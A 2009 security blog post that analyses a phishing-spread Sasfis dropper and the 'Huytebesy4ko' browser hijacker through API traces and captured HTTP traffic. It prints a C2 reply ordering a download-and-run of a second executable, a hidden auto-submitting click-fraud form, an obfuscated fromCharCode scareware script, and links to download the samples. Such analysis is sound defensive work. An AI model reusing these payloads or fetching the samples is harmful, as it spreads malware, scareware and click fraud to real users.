Skip navigation.
Home

Huytebesy4ko Hijacker analysis

Continuing on the road of scammail-spread malwares, today I am going to analyze an interesting little toy i accidentally get in touch just yesterday when receiving this funny email at my Universitary address from a fake crafted address notifications@crema.unimi.it:

We are contacting you in regards to an unusual activity that was identified in your mailbox. 
As a result, your mailbox has been deactivated. To restore your mailbox, you are required to 
extract and run the attached mailbox utility.

Best regards, crema.unimi.it technical support.

As you may guess there was an attachment called utility.zip containing an utility.exe which VirusTotal rates with a 73%.

This “utility” is a 18k weight simple dropper, which does not harm too much the system itself since it mostly executes a bunch Registry queries, read some files:

Thread ID: [ 1236 ], API Call: [ CreateFileW ]
	File: C:\DOCUME~1\Dev\IMPOST~1\Temp\1.tmp
Thread ID: [ 1236 ], API Call: [ CreateFileW ]
	File: C:\WINDOWS\system32\svchost.exe
Thread ID: [ 1236 ], API Call: [ CreateFileW ]
	File: C:\WINDOWS\system32\svchost.exe
Thread ID: [ 1236 ], API Call: [ CreateFileW ]
	File: C:\DOCUME~1\Dev\IMPOST~1\Temp\1.tmp

And spawns an instance of:

Thread ID: [ 1236 ], API Call: [ CreateProcessA ]
	Executable: [  ], Commandline: [ svchost.exe ]

As a common dropper the interesting part of its activity comes from the Network dump analysis: as first step it makes an HTTP GET request to an Ukranian server:

GET /limpopo/bb.php?id=654839857&v=200&tm=5&b=4316315581 HTTP/1.1
User-Agent: Opera\9.64
Host: 193.104.27.91

HTTP/1.1 200 OK
Date: Wed, 18 Nov 2009 21:19:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 91
Connection: close
Content-Type: text/html; charset=UTF-8

[info]runurl:http://promed-net.com/css/derce2.exe|taskid:13|delay:45|upd:0|backurls:[/info]

The PHP applications located at limpopo/bb.php retrieves another URL with another malware to be downloaded and executed, and so it does:

GET /css/derce2.exe HTTP/1.1
User-Agent: Opera\9.64
Host: promed-net.com

HTTP/1.1 200 OK
Date: Wed, 18 Nov 2009 14:28:12 GMT
Server: Apache
Last-Modified: Wed, 18 Nov 2009 08:22:49 GMT
ETag: "965f23-7e00-4b03aed9"
Accept-Ranges: bytes
Content-Length: 32256
Content-Type: application/octet-stream

[...]

Here the dropper ceases its activity and leaves the stage for the newly downloaded malware, which according to VirusTotal presents a poor identification rate (24%).

This time the sample is a way more complicated and versatile: it makes an extensive usage of Registry calls, the most important one creating parameters for boot time self-load.
It operates on the following files:

Thread ID: [ 1336 ], API Call: [ CreateFileA ]
	File: C:\DOCUME~1\Dev\IMPOST~1\Temp\rundll32.dll
Thread ID: [ 1336 ], API Call: [ CreateFileW ]
	File: C:\DOCUME~1\Dev\IMPOST~1\Temp\rundll32.dll
Thread ID: [ 1428 ], API Call: [ CreateFileA ]
	File:
Thread ID: [ 1428 ], API Call: [ CreateFileW ]
	File: C:\WINDOWS\system32\calc.dll
Thread ID: [ 1428 ], API Call: [ CreateFileA ]
	File:
Thread ID: [ 1428 ], API Call: [ CreateFileW ]
	File: C:\WINDOWS\system32\calc.dll

And spawns the following processes:

Thread ID: [ 1336 ], API Call: [ CreateProcessA ]
	Executable: [  ], Commandline: [  ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\verclsid.exe ], Commandline: [ / ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\reg.exe ], Commandline: [ " ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\verclsid.exe ], Commandline: [ / ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\reg.exe ], Commandline: [ " ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\verclsid.exe ], Commandline: [ / ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\reg.exe ], Commandline: [ " ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\verclsid.exe ], Commandline: [ / ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\reg.exe ], Commandline: [ " ]
Thread ID: [ 1336 ], API Call: [ CreateProcessW ]
	Executable: [ C:\WINDOWS\system32\cmd.exe ], Commandline: [ " ]

There were no evidences of remote created threads, even though it’s heavily possible due to the nature of its activity.

This malware makes a very extensive Network activity, acting on multiple fronts and with multiple illegal activities and frauds.
Substantially it intercepts HTTP requests and hijacks them through a remote controller located at:
http://www.huytebesy4ko.net
Which provides several possible operations to be accomplished from Click fraud to Scareware deployment.

That website is used to randomly launch a specific activity hijacking the legitimate traffic with other requests such as:

GET /?do=search&q=Click%20here%20to%20view%20your%20files. HTTP/1.0
Host: huytebesy4ko.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: bbbbbbbbbate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: [HIJACKED WEBSITE]
Cookie: PHPSESSID=d48e6dd1492885258dafb9adcfe0c32e

HTTP/1.1 200 OK

Server: nginx
Date: Wed, 18 Nov 2009 15:52:55 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Content-Length: 1625

Which retrieves:

<html>
<body>
<div style="display:none">
<form id="sub" name="sub" style="display:none" method="GET">

<input name="do" value="click">
<input name="url" value="http://64.111.196.117/c.php?s=eNo1lMvOsswWhC-I5O1umgZ68A0UEFAEBQ
RksmPTHJSDggpKuPjfyR5UalSpStbKc10QVam8iHjZ3wyywD8IIfq_iRBShJAKKZGRuPC2afj079_CoShSfOGc8YLAS4EVVeY5ln7KOETsf
xfCVY5yrCgFx4iohCoS40SihazmRBEXLC94yd0HP9HXV7qVR5C-SKh9VshZR_0Fu_6doaYMYh5u5FoxOv2xXa1XqlkAtNMy4s2xl7ybsUMt
ToRQzS2swrBAU28DPgnK3eoKkcWZpysKKoB87_qgbKTzWLzOw0g3b_db142NkahuUdCz9JmuBBhXn_v98-5Ljz-lGhjmXpEv5FLuP68Kfq6
poRaqdLHylD5Ah8pwB9kL6Kw8lS-m1XxvNdfH6_0YZ7_9VQXGYD0P66dtH5nXSw29k8OQ7IwX3iXCI9bR4Tkf2uKYzPkm05GfdBrfQ8Puai
9b3-CtbNNEKNebLDilW0km-bdZsy9phk3IrmMnrKdO3ugiHOP0fG9Imokl8uq6Pc_fXTE1XfRe9yaXEl_ZM-5m38EWD-mpL4TPFidNVqqim
K9vQh5owenYGhFdPYTQavy4iWEhrNkORjG6P_pD4ZpaBYSt-25PKz5hTdfUy40To33Jk__N-7alEgP9EwIcRe1B6LUyRWyLkFzRR3veoW-C
7GqrD-ewdtn3N3syPLfmJR6BOJyw3EfTOrYOSnbt5pOdDZMRrkqjxMq49TTfxlR3UH-1Q3BSihKQl1nw2vM7Zhqp6WvklZzYLcRjGOL8WWk
Wl0iYGFq9HTL6QSq2sjAXrQk_HSAQqgNgihuWGN-0TAxga_MYJc5pJzDjfFS9Y5Pkmd4dIxDt4dqh1fy4gbmZz34H3NHUyqPgO5-83VuPoD
6D46W761noVnhoNbUpPWqOMDzuhWP0tAPhjA8Aw7Oa2eJGuZR6PHqKBaZ5mDD4-LSLJytwsHAdJ2ts7NZ3pEbeRjvoi4lb608g9VnF5Fzd2
MF1wLNZeNWO3lvIiw0rwOAfwNCUg6Lh3W12jsnvWE5aFeP-IKiN3MVbqjIcM70Szd_Ty3JMnOndgUgqPhUVnHf7xfuC0OwrvJ9A9e-9MnKn
LSlYNZL3TnzBSVlnCi56G64k3adeYQ_y1vNdPUVBoDz9QOjTIXcpN06pmhdTDGIDEAUJXjzKcwGqjVB0o6RvD2_PKH_sUMU_Iv0hLP8hUVo
Wmf7J5E-Cf6K8wGURFxY3t6ylMxNT6LTuyAJasc5__ODz5cn-34IgUqC6IFVE6i8CfyC5WBHhZnRNE5e45mt0WtLw1a-MyPCS5VQlkMhUKl
AOcxmhDPGcIZwX_D91Fpn1">
</form>
</div>
<script>

document.getElementById('sub').submit();
</script>
</body>
</html>

Resolving in another request pointing to a subdomain of a Pay-per-Click advertising company named NDot.com (at least it seems to be) resolved as following:

GET /clickn.php?fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9qRTRPbnR6T2pnNkltWmxaV1JmYzJWMElqd
HpPakU2SWpJaU8zTTZOem9pYzNWaVlXWm1kQ0k3Y3pvek9pSXlNVGtpTzNNNk56b2liR2x6ZEY5cFpDSTdjem96TWpvaU0ySm
1ORFpqTjJVMU16UTVOVGc0WXprNVlqQXhaRFpqWm1SalpqRm1NV1FpTzNNNk9Eb2lZMnhwWTJ0ZmFXUWlPM002TXpJNkltUXl
OemN5WWpFelpUUmxZekprTVRkbU5UVXhaV1pqWTJGaU1UTTVPVEkwSWp0ek9qazZJbXhwYzNSZmRHbHRaU0k3Y3pveE9Ub2lN
akF3T1MweE1TMHhPQ0F3T1RvMU9Ub3dPQ0k3Y3pvek9pSjFjbXdpTzNNNk5EUTZJbWgwZEhBNkx5OXRkV2Q1Y21FdWIzSm5MM
04xZEhKaEwybHVMbU5uYVQ4eE5UMG1TVVE5TVRBMU1qZ3pJanR6T2pRNkltdHdjR2tpTzNNNk5Ub2lNVGMzT0RNaU8zTTZNam
9pYVdRaU8zTTZOam9pTVRBeE56QTRJanR6T2pjNkltdGxlWGR2Y21RaU8zTTZNVGs2SWtOb2IyOXpaU0I1YjNWeUlIQmhlVzF
sYm5RaU8zTTZNam9pYVhBaU8zTTZNVE02SWpneUxqVTBMakV6Tmk0eE1qUWlPM002TVRJNkltTnZkVzUwY25sZlkyOWtaU0k3
Y3pveU9pSkpWQ0k3Y3pvek9pSmhabVlpTzNNNk5qb2lNVEExTWpneklqdHpPalk2SW5OMVltRm1aaUk3Y3pveU9pSXhNU0k3Y
3pvek9pSmlhV1FpTzNNNk5Eb2lNQzR3TVNJN2N6bzNPaUp0WVhoZlkzQmpJanR6T2pRNklqQXVNREVpTzNNNk9Ub2labWw0Wl
dSZlkzQmpJanR6T2pFNklqQWlPM002TmpvaVkyRmphR1ZrSWp0cE9qQTdjem94TXpvaVlXUjJaWEowYVhObGNsOXBaQ0k3Y3p
vME9pSXhORGswSWp0OWN6b3pPaUp0WkRVaU8zTTZNekk2SWpNMk9XUm1OR1F6WldKak1EVTJOamswWWpabE5UVTNZakJpTnpO
aU5USTBJanQ5&b=MC4wMDAx&p=MA== HTTP/1.0
Host: feed.ndot.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: bbbbbbbbbate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://huytebesy4ko.net/?do=search&q=Choose%20your%20payment

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.63
Date: Wed, 18 Nov 2009 14:59:23 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.11
Set-Cookie: uid=41ac974bd63aa2bb05b7e9804845ab40; expires=Thu, 18-Nov-2010 14:59:23 GMT
Location: http://mugyra.org/sutra/in.cgi?15=&ID=105283&fb=WVRveU9udHpPamc2SW5WelpYSmtZWFJoSWp0aE9q
TTZlM002TWpvaWFXUWlPM002TnpvaU56VTFNRFExT0NJN2N6b3hNam9pWVdSMlpYSjBhWE5sWDJsa0lqdHpPalk2SWpFd01UY3
dPQ0k3Y3pvME9pSnJjSEJwSWp0ek9qVTZJakUzTnpneklqdDljem96T2lKdFpEVWlPM002TXpJNklqTTVZVGMyTkROa01qTmhO
R1F4Tm1JME1qSm1OREUyWXpnNVpUazFObUk1SWp0OQ%3D%3D

It also happens to launch more harmful requests to specifically created and crafted websites to scareware deployment for spyware/adware spreading.
An example of such kind of requests is the following:

GET /scan1/?pid=257&engine=%3DHmz9DjuODQuMTM2LjEyNCZ0aW1lPTEyNTU1MUYONAkN HTTP/1.0
Host: today-scann.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: it-it,it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: bbbbbbbbbate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://huytebesy4ko.net/?do=search&q=Choose%20your%20payment

Which results in a common fake scan page generated from a sick JavaScript String.fromCharCode evasion as you can see:

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<link href="img/style.css" rel="stylesheet" type="text/css" />

<script type="text/javascript">
.var madugapa=[713,763,819,808,819,811,804,765,768,813,819,808,735,818,815,824,
822,800,817,804,735,818,802,800,813,763,750,819,808,819,811,804,765,713,763,812,
804,819,800,735,807,819,819,815,748,804,816,820,808,821,764,737,770,814,813,819,
804,813,819,748,787,824,815,804,737,735,802,814,813,819,804,813,819,764,737,819,
804,823,819,750,807,819,812,811,762,735,802,807,800,817,818,804,819,764,788,787,
773,748,759,737,750,765,713,763,818,802,817,808,815,819,735,819,824,815,804,764,
737,819,804,823,819,750,809,800,821,800,818,802,817,808,815,819,737,735,818,817,
802,764,737,808,812,806,750,809,816,820,804,817,824,749,809,818,737,765,763,750,
818,802,817,808,815,819,765,713,763,818,802,817,808,815,819,735,819,824,815,804,
764,737,819,804,823,819,750,809,800,821,800,818,802,817,808,815,819,737,735,818,
817,802,764,737,808,812,806,750,809,816,820,804,817,824,748,808,813,808,819,749,
809,818,737,765,763,750,818,802,817,808,815,819,765,713,763,818,802,817,808,815,

[ A loooooooooooot more similar lines ]

735,817,804,812,814,821,804,735,819,807,808,818,735,819,807,817,804,800,819,735,
800,818,735,818,814,814,813,735,800,818,735,815,814,818,818,808,801,811,804,736,
735,735,735,735,735,735,763,750,803,808,821,765,713,735,735,735,735,735,735,735,
735,763,803,808,821,735,818,819,824,811,804,764,737,815,800,803,803,808,813,806,
748,819,814,815,761,735,756,751,815,823,762,735,815,800,803,803,808,813,806,748,
811,804,805,819,761,735,756,760,751,815,823,762,737,765,763,800,735,807,817,804,
805,764,737,750,803,814,822,813,811,814,800,803,749,815,807,815,766,808,803,764,
753,756,758,737,765,773,820,811,811,735,818,824,818,819,804,812,735,802,811,804,
800,813,820,815,763,750,800,765,763,750,803,808,821,765,713,735,735,763,750,803,
808,821,765,713,763,750,803,808,821,765,713,763,818,802,817,808,815,819,735,811,
800,813,806,820,800,806,804,764,737,809,800,821,800,818,802,817,808,815,819,737,
735,818,817,802,764,737,808,812,806,750,806,804,814,808,815,749,809,818,737,765,
763,750,818,802,817,808,815,819,765,713,763,750,801,814,803,824,765,763,750,807,
819,812,811,765,737];
var vazanugumyp='';
var dyje='';
for (i=0; i<madugapa.length; i++){
dyje=madugapa[i]-703;
vazanugumyp=vazanugumyp+String.fromCharCode(dyje);
}
.document.write(vazanugumyp);
</script>

Which simply results in the well-known XP-like scareware pages:
http://playhack.net/wp-content/uploads/2009/11/scareware_1.png

Special gift for you!
http://playhack.net/wp-content/uploads/2009/11/scareware_2.png

That today-scann.com page is not the only one, that attack platform got plenty of scareware fresh address to rely on!
Huytebesy4ko.net has already been known to the community for almost a week now, but it was really funny and interesting to view its spreading method; I’m pretty sure that its nasty activity does not limit to those exposed in this post, since it seems to be constituted of large cybercrime’s websites network.

For your own fun, I arranged the downloads at the following addresses:
- Sasfis Dropper
http://mw.playhack.net/collection/eec53e2239800e5d85b6b85d5e2451cb.zip
- Huytebesy4ko Hijacker
http://mw.playhack.net/collection/8f55eeba46fec5a5cccd3fc0f75027ce.zip

Bye